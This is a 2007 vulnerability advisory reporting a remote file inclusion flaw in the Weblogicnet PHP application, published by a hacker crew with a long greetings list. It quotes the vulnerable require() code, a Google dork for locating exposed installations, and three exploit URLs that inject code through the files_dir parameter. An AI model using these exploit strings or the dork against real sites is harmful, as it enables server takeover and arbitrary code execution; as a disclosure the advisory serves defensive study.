SolpotCrew Advisory #15 (home_edition2001) - Weblogicnet (files_dir) Remote File Inclusion

2007-09-11T00:00:00
ID SECURITYVULNS:DOC:17961
Type securityvulns
Reporter Securityvulns
Modified 2007-09-11T00:00:00

Description

#######################Nyubicrew Community

Weblogicnet (files_dir) Remote File Inclusion

vendor : http://www.weblogicnet.com/

source : http://weblogicnet.com/data/weblogicnet.tgz

Bug Found By :home_edition2001 a.k.a (bius) (31-08-2007)

contact: bius22@mac.com

Website : www.solpotcrew.org/adv/home_edition2001-adv-02.txt

Greetz: Nyubi aka solpot , Matdhule , S4M3K ,[DEVIL_MAY_CRY] , iFX , Scr3W_W0rM ,

nakkuta , bukan-diriku , POET , Th0nk , mbako_semprul , Fungky , airsoul

wong_edan , ^s0n_g0ku^ , aLiiF , sparta-x , dudut , xtremeshell , Bithedz

th3sn0wbr4in , ReAksi , X8 , junkiest , K1tk4t , masboi , saritem

x-ace , replacement_killer , LamerCrew , k1n9k0ng ,[K]ompoR_Meledu[K]

and all member #nyubicrew @ irc.mildnet.org

especially thx to str0ke @ milw0rm.com

Input passed to the "files_dir" is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

code from : es_desp.php es_custom_menu.php es_offer.php

Weblogicnet

http://www.weblogicnet.com/ info@weblogicnet.com

Use of this program constitutes your agreement to the terms contained in the

LICENSE file within this distribution.

<ahref=" <?php require($files_dir.'/_custom_menu_link.php'); ?>"> <?php require($files_dir.'/_custom_menu_name.php'); ?></a><br>

google dork : inurl:es_offer.php?files_dir=

exploit : http://somehost/path_to_Weblogicnet/es_desp.php?files_dir=[evilCode] http://somehost/path_to_Weblogicnet/es_custom_menu.php?files_dir=[evilCode] http://somehost/path_to_Weblogicnet/es_offer.php?files_dir=[evilCode]

################MY Special Girl JUST FOR U Ula
################################E.O.F